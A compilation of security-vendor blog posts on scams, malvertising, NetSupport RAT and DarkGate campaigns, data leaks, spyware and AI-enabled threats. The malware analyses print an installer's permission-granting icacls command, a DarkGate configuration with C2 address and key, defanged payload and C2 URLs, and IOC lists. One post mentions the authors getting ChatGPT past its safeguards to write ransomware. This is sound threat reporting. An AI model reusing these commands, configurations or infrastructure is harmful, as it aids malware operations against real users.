IT News

I would be the last one to provide scammers with good ideas, but as a security provider, sometimes we need to think like criminals to stay ahead in the race.

Recently, the US Postal Service (USPS) announced that it would suspend inbound packages from China and Hong Kong until further notice. That further notice, it turned out, was very short indeed, with the USPS announcing on February 5 that the interruption in service would itself be disrupted—packages were once again approved to enter the country. But the whiplash announcements, the second of which was dropped with little fanfare, have caused confusion.

So, there is an opportunity for scammers to exploit that confusion and uncertainty. Let me spell out how:

• Scammers could send messages about refunds based on packages that could not be sent.
• A revival of the old “Your package could not be delivered” scam could spring up.
• Phishers could send messages about goods that were rerouted through other countries.
• Goods—including counterfeit—could be offered for sale at “pre-tariff” rates.
• Malicious messages could claim to arrive from the shipper, the e-commerce platform, or Customs, asking for additional information to get a package released.
• Cybercriminals may set up fake USPS sites—as they have done in the past—to intercept searches for Track & Trace information.

Scammers are always looking to make money over other people’s backs. They will usually enter some kind of urgency into their messaging, like a time before which you have to respond. This is a good indicator because they don’t want you to think things through before you act.

How can you stay safe?

It’s best not to respond to any of these attempts, to avoid letting scammers know that someone is reading their attempts. It will likely cause an increase in spam and other attempts.

Depending on how the scam reaches you and what it is after, there are several ways to stay safe.

• Use a solution that offers text protection and text message filtering.
• Do not click on unsolicited links or open unsolicited attachments.
• Do not trust that sponsored ads lead to the legitimate company, we are seeing too many fakes.
• Do not trust links that use URL-shorteners, or at least unshorten the link before following it. The same is true for QR codes which are basically URLs in a different shape.
• Doublecheck the source of messages through a trusted way of communication with the shipper, e-commerce platform, or customs.

And please report fraud attempts with the Internet Crime Complaint Center (IC3), so others can be warned about common scams.

We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

There is a constant “cat and mouse” game between defenders and attackers, the latter trying to outsmart and get a head start on the former. In the context of online advertising, this involves creating fake identities or using stolen ones to push out malicious ads.

An attacker not only needs to evade detection but also create a lure that will be convincing to most people. In this blog post, we focus on what malvertisers use in almost all of their campaigns, namely decoys also known as “white pages” in order to fool the advertising entity.

The particular case is a malicious Google ad for Cisco AnyConnect, a tool often used by employees to remotely connect to company networks, but also by universities. In fact, we found that threat actors were using the name of a German university to create a fake website designed not to fool actual victims, but rather to bypass detection from security systems.

To be sure, victims were part of the overall scheme, but they were instead redirected to a lookalike Cisco site linking to a malicious installer containing the NetSupport RAT remote access Trojan.

The perfect disguise

The malicious ad comes up from a Google search for the keywords “cisco annyconnect“. The ad displays a URL that looks somewhat convincing for the domain anyconnect-secure-client[.]com. We should note that this domain was registered less than a day before the ad appeared.

Upon clicking on the ad, server-side checks will determine whether this is a potential victim or not. Typically, a real victim has a residential IP address and other network settings that differentiate it from crawlers, bots, VPNs or proxies.

In recent times, we have seen criminals rely on AI to generate fake pages that look innocuous. These are also referred to as “white pages” and they do serve an important purpose. If it’s obviously so fake and bad, it will raise suspicion. We thought that in this case the perpetrator had a rather clever idea by stealing content from a university that actually does use Cisco AnyConnect.

Technische Universität Dresden (TU Dresden), is a public research university in Germany whose site can be found here. Funnily enough, the threat actors left a trail while doing their copy/paste. We can see that they added the cookie opt-in notification which is required for websites in Europe, which here leaked their browser language (Russian).

Real victims get infected with malware

As good as this template looks, real victims will never see it. Instead, upon connecting to the malicious server they will be immediately redirected to a phishing site for Cisco AnyConnect.

The payload is downloaded in a similar way to a campaign we had already observed before, using a PHP script that provides the direct download URL. We can see from the network traffic capture below that the file is hosted on a likely compromised WordPress site.

There is not much to be said about the fake installer other than it being digitally signed with a valid certificate. Upon execution it extracts client32.exe, a name notorious for being associated with NetSupport RAT.

cisco-secure-client-win-5.0.05040-core-vpn-predeploy-k9.exe
  -> client32.exe
  -> "icacls" "C:ProgramDataCiscoMedia" /grant *S-1-1-0:(F) /grant Users:(F) /grant Everyone:(F) /T /C

The remote access Trojan connects to the following two IP addresses: 91.222.173[.]67 and 199.188.200[.]195, further granting a remote attacker access to the victim’s machine.

Conclusion

Brand impersonation is a common theme with search ads. As Google enforces various policies and uses algorithms to detect malicious activity, threat actors need to constantly come up with new ideas.

Reusing a university page was a clever idea, but there were a couple of things that made this attack shy of being perfect. The domain name, while very strong for impersonation, was newly registered. Since it was part of the ad’s display URL, it could have potentially been detected by Google. We also noted that the perpetrators left a trail when they copy/pasted the code from the university website, which identified their likely country of origin.

Having said that, the malware payload was digitally signed and had few detections when first seen, so this attack may have had a decent success rate.

As always, we recommend that users take precautions whenever looking up programs to download, and to be especially wary of sponsored results.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Indicators of Compromise

Malvertising infrastructure

anyconnect-secure-client[.]com
cisco-secure-client[.]com[.]vissnatech[.]com

NetSupport RAT download

berrynaturecare[.]com/wp-admin/images/cisco-secure-client-win-5[.]0[.]05040-core-vpn-predeploy-k9[.]exe
78e1e350aa5525669f85e6972150b679d489a3787b6522f278ab40ea978dd65d

NetSupport RAT C2s

monagpt[.]com
mtsalesfunnel[.]com
91.222.173[.]67/fakeurl.htm
199.188.200[.]195/fakeurl.htm

An online shop is more than just another way to sell your products. It comes with a responsibility to keep the web shop secure.

Cybercriminals are looking to steal your customers’ credit card details, their personal data, and even your revenue.

And it’s not as if using a platform that is used by major retailers makes it safe. Platforms like Shopify, Wix, and Magento are always under scrutiny of cybercriminals that are looking for a vulnerability that allows them to insert skimmers or get access to your database.

Let’s look at some examples to demonstrate my point.

A cybercriminal specializing in breaching Shopify stores is posting huge data sets as free downloads. Using the monicker ShopifyGUY, which implies they specialize in Shopify sites, the cybercriminal posted a few datasets containing millions of customer records.

For example, boAt is reportedly Indian’s most active company that markets audio-focused electronic gadgets. ShopifyGUY dumped files of a data breach with access to PII information of boAt customers, which has 7,550,000 entries.

ShopifyGUY also uploaded the Piping Rock database containing 2.1million email addresses from the online health products store Piping Rock.

We found several Magento-based web shops that had skimmers injected into their code busy stealing credit card information. One of them even infected visitors with the SocGolish malware, a sophisticated JavaScript malware framework that has been actively used by cybercriminals since at least 2017. It tricks users into running a script supposedly meant to update their browser. What it actually does is infect the machine and send the details back to a human operator, who can decide how best to monetize it. Lately, SocGholish has been found to install information stealers on both Windows and Mac machines.

How to secure your web shop

The most common attacks web shop owners need to worry about are:

• Credential phishing where the criminals try to steal your login credentials.
• Malware injection where the criminals inject malicious code into your web shop by abusing a vulnerability in the platform itself or a plug-in.
• Brute force attacks, where the criminals try a whole bunch of passwords they obtained from other breaches.

So, to keep your web shop safe you should:

• Be extra vigilant when it comes to phishing attempts.
• Keep your software up to date.
• Protect the device(s) you use to login with an active anti-malware solution.
• Make it harder to log in by using multi-factor authentication (MFA) and by not re-using passwords.
• Regularly check your web site for additional code, especially the payment section.
• If you run the web shop on your own server, use web application firewalls (WAF) to detect and block malicious traffic.
• Do not store customer details that you no longer need.

Your customers will probably not thank you for your efforts, but they will come complaining if you spill their data.

For readers that would like to check whether their credentials are included in one of the data breaches, Malwarebytes has a free tool for you to check how much of your personal data has been exposed online. Submit your email address (it’s best to give the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report and recommendations.

Making your own bad news is not what Valley News Live had in mind, but negligence comes at a price.

Cybernews researchers found an unprotected AWS S3 bucket that belongs to Take Valley News Live, a North Dakota-based television station. Gray Television, the owner of Valley News Live, makes for the third largest broadcasting company in the US.

An S3 bucket is like a virtual file folder in the cloud where you can store various types of data, such as text files, images, videos, and more. There is no limit to the amount of data you can store in an S3 bucket, and individual instances can be up to 5 TB in size.

In this case, the bucket stored over 1.8 million files with over a million of them being job seekers’ resumes. Of the 1.8 million exposed files, over a million of these files are resumes sent to the station over a period ranging from 2017 to 2024.

The leaked data included:

• Full names
• Phone numbers
• Email addresses
• Home addresses
• Dates of birth
• Nationality and places of birth
• Social media links
• Employment history
• Educational background

As you can imagine, these resumes represent a treasure trove for phishers and other cybercriminals.

What do I need to do?

Stolen resumes are bad news, as they can be used for financial fraud, identity theft, and cause privacy issues.

With all the details a phisher can find in a resume they can make their social engineering attempts very convincing. Or they can impersonate the person in the resume to defraud people they know, perform a SIM swap by tricking the victim’s carrier into helping them illegally take over their cell phone number and re-route it to a phone under the attacker’s control.

It also opens up the victim for financial fraud, such as the criminal setting up fraudulent bank accounts in their name, applying for loans or credit cards, file false tax returns, and use the victim’s identity to obtain employment.

And if the job application was recent enough, a phisher could probably trick the victim into downloading malware under the guise of engaging in the hiring process. For example, by clicking a malicious link or opening an attachment.

So, if you sent an application to Valley News Live, it would be wise to exercise your right to have your information removed and hope that no real criminals have found the leaky bucket by now.

Cybernews states it contacted Valley News Live multiple times but received no response.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

A paradigm shift in technology is hurtling towards us, and it could change everything we know about cybersecurity.

Uhh, again, that is.

When ChatGPT was unveiled to the public in late 2022, security experts looked on with cautious optimism, excited about the new technology but concerned about its use in cyberattacks. But two years on, much of what ChatGPT and other generative AI chat tools offer attackers is a way to improve what already works, not new ways to deliver attacks themselves.

And yet, if artificial intelligence achieves what is called an “agentic” model in 2025, novel and boundless attacks could be within reach, as AI tools take on the roles of “agents” that independently discover vulnerabilities, steal logins, and pry into accounts.

These agents could even hold people for ransom by matching stolen data online with publicly known email addresses or social media accounts, composing messages and holding entire conversations with victims who believe a human hacker out there has access to their Social Security Number, physical address, credit card info, and more. And if the model works for individuals, there’s little reason it wouldn’t work for individual business owners.

This warning comes from our 2025 State of Malware report, which compiled a year’s worth of intelligence to identify the most pressing cyberattacks on the horizon. Though the report’s guidance serves IT teams, its threats will impact individuals and small businesses everywhere. Remember that just last year a widespread IT outage grounded flights globally, cementing the relationship between companies, cybersecurity, and everyday people.

In 2025, agentic AI may further reveal just how closely tied everyone is in the battle for cybersecurity. Here’s what we might expect.

You can find the full 2025 State of Malware report here.

The generative AI non-revolution

The November 2022 launch of ChatGPT ushered forth a new relationship with our computers. No longer would we need to use our laptops, smartphones, and tablets to record or assist our creative work. Now, we could make those same machines complete the creative work for us.

AI image tools like Midjourney and DALL-E can create images when given simple text prompts. They can even mimic the styles of famous artists, like Van Gogh, Rembrandt, and Picasso. AI chat tools like ChatGPT, Google Gemini, and Claude—from OpenAI competitor Anthropic—can brainstorm ideas for marketing materials, write book reports, compose poems, and even review human-written text for legibility. These tools can also answer an endless array of factual questions, much like the separate AI tool Perplexity, which advertises itself not as a “search engine,” but as the world’s first “answer engine.”

This is the potential of “generative AI,” a term used to describe AI tools that can generate text, images, movies, summaries, and more, limited only by our imagination.

But where has that imagination brought us?

For unimaginative users, generative AI has made it easier to cheat in college classes and to abuse social media engagement algorithms to gain brief virality—hardly inspiring. And for malicious users, hackers, and scammers, generative AI has delivered oil-slick efficiency to proven attack methods.

Generative AI tools can more convincingly write phishing emails so that the tell-tale signs of a scam—like misspellings and clumsy grammar—are all but gone. The same is true for all text-based social engineering tricks, as AI chat tools can write alluring direct messages for romance scams and craft urgent-sounding texts that can fool people into clicking on links that carry malware.

Importantly, the attack methods here are not new. Instead, they’ve simply become easier to scale with the use of AI. But sometimes the AI pushes back.

With limitless, advertised potential, even tools like ChatGPT have boundaries, often precluding users from producing materials that could cause harm. In 2023, Malwarebytes Labs subverted these boundaries to successfully get ChatGPT to write ransomware—twice.

Because of these prohibitive rules, a set of malicious copycat AI tools can now be found online that will produce text and images that often break the law. One example is in the creation of “deepfake nudes,” which utilize AI technology to digitally stitch the face of one person onto another person’s nude body, creating fake nude “photographs.” Deepfake nudes have caused multiple crises across high schools in America, serving as a new type of ammunition for old weaponry: Blackmail.

The ability to create false text, images, and even audio has also allowed cybercriminals to create more believable threats when fraudulently posing as CEOs or executives to convince employees to, say, sign a bogus contract or hand over a set of important account credentials.

These are real threats, but they are not novel. As we wrote in the 2025 State of Malware report:

“The limited impact of AI on malware stems from its current capabilities. Although there are notable exceptions, generative AIs tend to provide efficiency rather than brand new capabilities. Cybercrime is a very mature field that relies on a set of well-established tools, such as phishing, information stealers, and ransomware that are already feature complete.”

That could change in 2025.

“Agentic” AI and a new landscape of attacks

Agentic AI is the next big thing in artificial intelligence, even if you’ve never heard about it before.

Google, Amazon, Meta, Microsoft, and more have all begun experimenting with the technology, which promises to take AI out of its current chatbot silo and into a new landscape where individualized AI “agents” can help with specific tasks. These agents could, for example, more effectively respond to simple customer support questions, help patients find in-network providers with their health insurance, and even suggest strategy based on a company’s most recent performance. Microsoft, for its part, has already teased its AI agent that answers employee questions around HR policies, holiday schedules, and more. Salesforce, too, is investing heavily in agentic AI, positioning the technology as a personal assistant for everyone.

As we wrote in the 2025 State of Malware report:

“If agentic AIs arrive in 2025, they won’t just answer questions, they will be able to think and act, transforming AI from an assistant that responds to prompts, into a peer, or even an expert that can plan out tasks, interact with the world, and solve the problems it encounters.”

The implications for cyberattacks are enormous. If put into the wrong hands, malicious attackers could ask AI agents to:

• Search vast troves of stolen data to match leaked Social Security numbers with leaked email addresses, composing and sending phishing emails that threaten more data exposure unless a ransom is paid.
• Scrape public social media feeds for baby photos that are delivered to other AI agents that create fake profiles that weaponize those baby photos as empty threats against a child’s safety.
• Scour LinkedIn to create a database of potentially viable email addresses from countless companies by deducing the email address format—first name, last name; first initial, last name; etc.—from publicly listed email addresses, and then mirroring that format to write and send bogus requests from executives to their direct reports.
• Comb through public divorce records across multiple states and countries to identify targets for romance scams, who receive messages and who can carry on with whole conversations composed and controlled by another AI agent.

These attacks threaten not only individuals but small businesses, too, as a vulnerability in a person’s device can become a malware attack on a network. The same is true in reverse—if attacks on companies become more accessible, then the data that people give these companies becomes more vulnerable to exposure.

Thankfully, where agentic AI poses a risk, it also poses a boon, as individual AI agents could be tasked with finding a company’s vulnerabilities, responding to suspicious activity on its network, and even guiding everyday people into safely posting online, searching the web, and buying from unknown retailers.

The truth is that AI is here to stay. There is already too much investment from the largest developers and companies for that to reverse course any time soon. So, if the threat is that attackers might harness this AI, then the foreseeable future will involve a lot of defenders and everyday people harnessing it, too.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

WhatsApp has accused the professional spyware company Paragon of spying on a select group of users.

WhatsApp, the Meta-owned, end-to-end encrypted messaging platform, said it has reliable information that nearly 100 journalists and other “members of civil society” were targets of a spyware campaign conducted by the Israeli spyware company.

“Members of civil society” usually refers to individuals and organizations that operate independently from government and business sectors, often those advocating for public interests, influencing policy, or holding governments accountable.

In a statement, a WhatsApp spokesperson said:

“This is the latest example of why spyware companies must be held accountable for their unlawful actions. WhatsApp will continue to protect people’s ability to communicate privately”

Many such targets use WhatsApp because they rely on the end-to-end encryption (E2EE) that it offers by default to safeguard communications, protect sources, and shield sensitive information from prying eyes.

The targets were spread over two dozen countries, including several in Europe. WhatsApp notified the possibly affected accounts through its own app. The platform has the ability notify users about sensitive matters directly via a WhatsApp chat. In such a case, the chat will include a system message at the top of the chat that verifies that it originates from the official account of WhatsApp Support, and there will be a blue checkmark next to WhatsApp Support at the top of the chat.

A spokesperson stated that WhatsApp was able to identify and block the attack vector which Paragon used in these attacks. Reportedly, the hacking campaign used malicious PDFs sent via WhatsApp groups to compromise targets. The attack apparently required no action from the target, a so-called zero-click attack.

Researchers have often compared Paragon’s Graphite spyware to the Pegasus spyware, a deeply invasive tool developed by a company called NSO that WhatsApp has been fighting in court since 2019. But up until now, Paragon was able to keep a low profile. This is the first time that Paragon has been publicly linked to a hacking campaign that allegedly targeted journalists and members of civil society.

WhatsApp has sent Paragon Solutions a cease-and-desist letter following the series of attempted attacks. Meta also notified Canadian privacy watchdog Citizen Lab. Citizen Lab’s researcher John Scott-Railton says they observed this campaign and have started an investigation.

The attacks reportedly took place in December 2024. If you are a potential target and you received a suspicious PDF you can reach out to Citizen Lab or the non-profit digital security helpline AccessNow.

If you received a WhatsApp notification about the attack, you can contact WhatsApp Support in-app by clicking here.

We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

During the past several months there have been numerous malware campaigns that use a technique something referred to as “ClickFix”. It often consists of a fake CAPTCHA or similar traffic validation page where visitors are instructed to paste and execute code in order to proceed.

We have started to see ClickFix attacks more and more via malicious Google ads as well. This is in contrast to typical phishing pages where victims download a so-called installer that contains malware.

In a recent malvertising campaign targeting the Notion brand, we observed these two techniques used at play. It’s quite possible the threat actors were collecting metrics to determine which one of the two gave them the most conversions via malware installs.

This blog post details this campaign that ultimately delivered the DarkGate malware loader.

Overview

Web traffic view

Delivery #1: PowerShell code via “ClickFix”

Malicious ad and social engineering

Threat actors created a Google ad for the popular utility application Notion. The first time we clicked on the ad, we were redirected to a site showing a “Verify you are human” page, also known as Cloudflare Turnstile. Except this was not the real Cloudflare, and merely a social engineering trick.

The HTML source code was obfuscated to only show gibberish interlaced with Russian comments, which we later determined was Rot13, a letter substitution cipher. This was likely used to hide the offending code from prying eyes and network rules:

After checking the box to verify we are human, we see new instructions, “Verification steps”, that involve pressing a number of key combinations. Windows + R launches the run dialog while Ctrl + V will paste whatever is in the clipboard. Supposedly this code is part of the verification process, but instead when pressing Enter, the victim will run a malicious command:

PowerShell and payload

The code copied into the clipboard is actually a command line that runs PowerShell:

The Base64 encoded string retrieves the following code from hxxps[:]//s2notion[.]com/in.php?action=1:

This downloads a binary from hxxps[:]//s2notion[.]com/in.php?action=2. and runs its. That file contains an AutoIt script that launches from:

"c:temptestAutoit3.exe" c:temptestscript.a3x

The following DarkGate configuration was extracted from it:

{'DarkGate': {'C2': [['155.138.149.77']], 'unknown_8': ['No'], 'name': ['DarkGate'], 'unknown_12': ['R0ijS0qCVITtS0e6xeZ'], 'unknown_13': ['6'], 'unknown_14': ['Yes'], 'port': ['80'], 'startup_persistence': ['Yes'], 'unknown_32': ['No'], 'check_display': ['Yes'], 'check_disk': ['No'], 'min_disk_size': ['100'], 'check_ram': ['No'], 'min_ram_size': ['4096'], 'check_xeon': ['No'], 'unknown_21': ['No'], 'unknown_23': ['Yes'], 'unknown_31': ['No'], 'unknown_24': ['N-traff'], 'campaign_id': ['user1'], 'unknown_26': ['No'], 'xor_key': ['sDcGdADE'], 'unknown_28': ['No'], 'unknown_29': ['2'], 'unknown_35': ['No'], 'tabla': ['a2THNyA]7u6Kiv$8k.F*ZrO"do1wL9P0 3}eCGDY{XVzctg,&EhJfsx=n)mpQUqljIW5SRMb4B([']}}

Delivery #2: signed executable

Malicious ad and decoy site

We saw this scenario after revisiting the malicious ad for a second time. Notice how the URL path is now including “/download/”.

This is the more traditional approach to malvertising for software downloads that we’ve seen for a while now. Victims download an executable after being tricked with a lookalike site. The file was found hosted on Github under the user profile herawtisabela1992:

This fake Notion installer was digitally signed (now revoked) by KDL CENTRAL LIMITED. Similar to the other binary mentioned in the first delivery technique, this one also extracts an AutoIt payload, with the same DarkGate configuration.

It’s interesting to note that the same GitHub user account previously distributed a backdoor called Warmcookie (aka Badspace) from:

raw[.]]githubusercontent[.]com/herawtisabela1992/check/refs/heads/main/920836164_x64.exe

Conclusion

We were not surprised to see the ClickFix social engineering attack here, but what made this campaign interesting what that it alternated between ClickFix and the typical file download.

It’s quite likely someone is tracking stats and comparing numbers to see which of the two delivery methods yields the most successful installs. If we had to put our money on it, we would bet that ClickFix is ahead. The file download technique remains effective, especially if the payload is digitally signed, but it could be relegated to second place in the near future.

Malwarebytes detects both payloads as Trojan.Dropper and Backdoor.DarkGate.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Indicators of Compromise

Malvertising infrastructure

notionbox[.]org
s2notion[.]com

Payloads

6b6676267c70fbeb3257f0bb9bce1587f0bdec621238eb32dd9f84b2bcd7e3ea
4fe8bbc88d7a8cc0eec24bd74951f1f00b5127e3899ae53de8dabd6ff417e6db

It’s not often that we get to share good news, so we wanted to grab this opportunity and showcase some progress made by law enforcement actions against cybercrime with you.

Europol notified us about the take-down of two of the largest cybercrime forums in the world. With over 10 million users, Nulled and Cracked serviced cybercriminals from all over the world with a quick entry point into the cybercrime scene.

On the forums people not only discussed how to optimize their cybercrime efforts but also provided several cybercrime-as-a-service options, including data, malware, and hacking tools.

Law enforcement agencies not only seized the forums but also managed to take down associated services like the money launderer Sellix and a “bulletproof” hosting service called StarkRDP, which enjoyed heavy promotion on both platforms and operated under the same suspects.

Bulletproof hosting refers to web hosting services that cater specifically to cybercriminals by allowing them to host illegal activities and content. These hosting providers promise anonymity, operate with very few rules, and typically ignore requests from law enforcement to remove harmful or illegal material.

These two forums also offered AI-based tools and scripts to automatically scan for security vulnerabilities and optimize attacks.

This operation was an international effort supported by Europol and the Federal Bureau of Investigation (FBI) involving law enforcement from Australia, France, Germany, Greece, Italy, Spain, and Romania.

In a separate action, Dutch police and the US Department of Justice (DOJ) dismantled an international cybercrime network called HeartSender (aka Saim Raza or The Manipulators). This crime network specializes in developing and selling phishing kits. Their tools to power spam campaigns attracted thousands of customers interested in sending vast amounts of phishing emails, stealing login credentials, and exploiting compromised systems.

Law enforcement seized a total of 39 domains and servers belonging to HeartSender in an international effort. The law enforcement agencies remotely disabled the illegal software sold through these servers. On the servers the police also found datasets including millions of victim records.

But they also found buyer records, which will be subject to a follow-up operation. Operations like HeartSender, Nulled, and Cracked make cybercrime accessible for aspiring criminals that have no working knowledge of programming or other computer skills. As always, we’ll have to wait and see how effective such actions are in the long run. As we all know, these “enablers” have a tendency to grow back in other places, not caring about their customers or their victims, only their Bitcoin wallets matter. But for now, it will take them some time to get back in action—time they can’t spend defrauding innocent victims.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Just days after we uncovered a campaign targeting Google Ads accounts, a similar attack has surfaced, this time aimed at Microsoft advertisers. These malicious ads, appearing on Google Search, are designed to steal the login information of users trying to access Microsoft’s advertising platform.

Microsoft does purchase ad space on its rival’s dominant search engine; however, we found Google sponsored results for “Microsoft Ads” (formerly known as Bing Ads) that contained malicious links created by impostors.

Through shared artifacts, we were able to identify additional phishing infrastructure targeting Microsoft accounts going back to a couple of years at least. We have reported these incidents to Google.

Fake Microsoft Ads caught on Google Search

Microsoft made an estimated $12.2 billion in search and news advertising revenues (including Bing) in 2023, which pales in comparison to its rival, Google, holding a much larger share of the search engine market.

Since the advertising ecosystem allows for an open competition between brands, Microsoft is trying to get traffic and earn clicks from Google searches. During our investigation, we saw sponsored results for Microsoft Ads and Bing Ads that managed to slip through Google’s security checks:

Redirection, cloaking and Cloudflare

The threat actors are using different techniques to evade detection and drop traffic from bots, security scanners and crawlers. Unwanted IP addresses (e.g. VPNs) are immediately redirected to a bogus marketing website (Figure 2). This is also known as a “white page”, meaning it looks innocent and hides its maliciousness.

Users that appear to be genuine are presented with a Cloudflare challenge to verify they are human. This is a legitimate instance of Cloudflare, unlike the “ClickFix” type-of-attacks that have become very common place and trick people into pasting and executing malicious code.

Rickroll for the cheaters

After a successful Cloudflare check, users are redirected to the final phishing page via a special URL, that acts as some sort of entry point for the malicious domain ads[.]mcrosoftt[.]com. You can see the network requests related to this redirection chain in Figure 4 below.

If you were to visit that domain directly instead of going through the proper ad click you’d be greeted with a rickroll, an internet meme designed to make fun of someone. The sandbox for the web urlscan.io has several examples of crawl requests for URLs on that server (37.120.222[.]165) that all went to the rickroll.

Phishing page

After much subversion, real victims finally see the phishing page for the Microsoft Advertising platform. The full URL in the address bar is meant to imitate the legitimate one (ads.microsoft.com).

The phishing page gives user a fake error message enticing them to reset their password and seemingly tries to get past 2-Step verification as well. Handling 2FA has become a standard feature in most phishing kits, due to the rise in user adoption of this additional security layer.

Larger campaign

Going back to urlscanio, we fed it the special entry URL and it was able to navigate to the phishing page. From there, we can look at the various web requests and find something to pivot on in order to identify additional infrastructure.

The favicon.ico file is one starting point and we can query for any scans that match its hash, excluding the official Microsoft domain. The results show that in the past week, there were several other domains that appear to be related to the theft of Microsoft Ads accounts.

But this campaign appears to go back further at least a couple of years and maybe more, although it becomes somewhat tricky to know if the malicious infrastructure is tied to the same threat actors. It’s worth noting that several of the domains are either hosted in Brazil or have the ‘.com.br‘ Brazilian top-level domain.

What we discovered may only be the tip of the iceberg; by starting to investigate compromised advertiser accounts we may very well have opened Pandora’s box. This isn’t only Google or Microsoft ad accounts we are talking about, but potentially for Facebook, and many others. Of course, our scope so far has been Google Search, but we know that other platforms are rife with such phishing attacks.

These recent malvertising campaigns highlight the ongoing threat of phishing through online advertising. While tech companies like Google work to combat these issues, users must remain vigilant. Here are some key steps you can take to protect yourself:

• Verify URLs: Always carefully examine the URL in your browser’s address bar before entering any credentials. Scrutinize URLs for inconsistencies or misspellings.
• Use 2-Step verification wisely: it adds an extra layer of security to your accounts, but you still need to pay attention to requests before granting them access.
• Regularly monitor your accounts: Check your advertising accounts for any suspicious activity such as changes in administrator accounts.
• Report Ads: If you encounter a suspicious ad, report it to for the benefit of other users.

We don’t just report on threats—we block them

Malwarebytes Browser Guard offers traditional ad-blocking augmented with advanced heuristic detection. Download it today.

Indicators of Compromise

The following IOCs are comprised of domains that shared attributes with our initial phishing page, including the favicon and images. Some of them go back further but are provided for threat hunters who may wish to further investigate these campaigns.

30yp[.]com
aboutadvertselive[.]com
aboutblngmicro[.]cloud
account-microsoft[.]online
account-microsoft[.]site
account-mircrosoft-ads[.]com
account[.]colndcx-app[.]com
accounts-ads[.]site
accounts-mircrosoft-ads[.]online
acount-exchang[.]store
admicrosoft[.]com
admicrsdft[.]com
ads-adversitingb[.]com
ads-dsas[.]site
ads-microsoft[.]click
ads-microsoft[.]coachb-learning[.]com
ads-microsoft[.]live
ads-microsoft[.]lubrine[.]com[.]br
ads-microsoft[.]online
ads-microsoft[.]shop
ads-microsoftz[.]online
ads-miicrosoft[.]com
ads-mlcrosft[.]com
ads-mlcrosoft-com[.]blokchaln[.]com
ads[.]microsoft[.]com[.]euroinvest[.]ge
ads[.]mlcr0soft[.]com
ads[.]mlcrosoft[.]com[.]ciree[.]com[.]br
ads[.]mlcrosoft[.]com[.]poezija[.]com[.]hr
ads[.]rnlcrosoft[.]com[.]euroinvest[.]ge
adslbing[.]com
adsmicro[.]exchangefastex[.]cloud
adsmicrosoft[.]shop
adsverstoni[.]com
advertiseliveonline[.]com
advertising-bing[.]site
advertising-mlcrosoft[.]org
adverts2023[.]online
advertsingsinginbing[.]com
agency-wasabi[.]com
app[.]beefylswap[.]top
bîlkub[.]com
bing-ads[.]com
bing[.]login-acount[.]me
bitmax-us[.]com
blngad[.]online
blseaccount[.]cloud
bltrue[.]colnhouse-fr[.]us
côinlíst[.]online
colneex-plalform[.]cloud
connec-exchan[.]site
digitechmedia[.]agency
forteautomobile[.]com
global-verifications[.]com
global-verify[.]com
homee-acount[.]com
itlinks[.]com[.]cn
krakeri-login[.]com
login-adsmicrosoft[.]helpexellent[.]com
login[.]adsadvertising[.]online
login[.]microsofttclicks[.]live
micrasofit[.]xyz
microosft[.]accounts-ads[.]site
microsoft-ads[.]website
microsoftadss[.]com
microsoftadversiting[.]cloud
microsoftbingads[.]com
microsofyt[.]adversing-publicidade[.]pro
mictrest[.]mnws[.]ru
mlcrosoft-bing-acces[.]click
mlcrosoftadvertlsing[.]online
mudinhox[.]site
ndnet[.]shop
phlyd[.]com
portfoliokrakenus[.]com
portfoliolkraken[.]com
portfoliopro-us[.]com
portfolioskranen[.]com
portofolioprospots[.]com
potfoliokeiolenen[.]com
potfoliokelaken[.]com
potfoliokelaneken[.]com
potfoliokenaiken[.]com
potfoliokenkren[.]com
potfolioketonelen[.]com
potfolioskaneken[.]com
potfolioskenaken[.]com
potfolioskraineken[.]com
potfolioskranaken[.]com
potfolioskraneken[.]com
pro-digitalus[.]com
prokrakenportfolio[.]com
rnlcrosoft[.]smartlabor[.]it
sig-in-mlcrosoft-advertisings[.]site
uiiadvertise[.]online
wvvw-microsoft[.]xyz
www-bingads[.]com
www-microsoftsads[.]com
www-v[.]userads[.]digital
www34[.]con-webs[.]com
www55[.]con-webs[.]com

ads-microsoft[.]bewears[.]com
ads[.]msicrosoft[.]com

The sudden rise of DeepSeek has raised concerns and questions, especially about the origin and destination of the training data, as well as the security of the data.

For those returning from a short holiday away from the news, DeepSeek is a new player on the Artificial Intelligence (AI) field. The Chinese startup has certainly taken the app stores by storm: In just a week after the launch it topped the charts as the most downloaded free app in the US. This caused an upset on the stock markets that cost nVidia and Oracle shareholders a lot of money.

DeepSeek has been called an open-source project, however this technically is not true because only the model’s outputs and certain aspects are publicly accessible. This makes it qualify as an open-weight model. Anyway, the important difference is that the underlying training data and code necessary for full reproduction of the models are not fully disclosed.

And it’s the data that pose a concern to many. OpenAI has accused DeepSeek of using its ChatGPT model to train DeepSeek’s AI chatbot, which triggered quite some memes. If only because OpenAI previously suffered accusations of using data that was not its own in order to train ChatGPT.

Authorities have started to ask questions as well. The Italian privacy regulator GPDP has asked DeepSeek to provide information about the data it processes in the chatbot, and its training data.  Because it sees a risk to the privacy of millions of Italian citizens, GDPD has demanded DeepSeek answers within 20 days questions about:

• Which personal data is collected
• The origin of the data
• Purpose for the collection
• Whether the data is stored on servers in China

According to the Italian press agency ANSA, DeepSeek disappeared on January 29, 2025 from Google and Apple’s app stores in Italy.

And if all that isn’t scary enough, researchers at Wiz have found a publicly accessible database belonging to DeepSeek.

“This database contained a significant volume of chat history, backend data and sensitive information, including log streams, API Secrets, and operational details. “

The database was not just accessible and readable, it was also open to control and privilege escalation within the DeepSeek environment. No authentication was required, so anybody that stumbled over the database was able to run queries to retrieve sensitive logs and actual plaintext chat messages, and even to steal plaintext passwords and local files.

Needless to say, this oversight put DeepSeek and its users at risk.

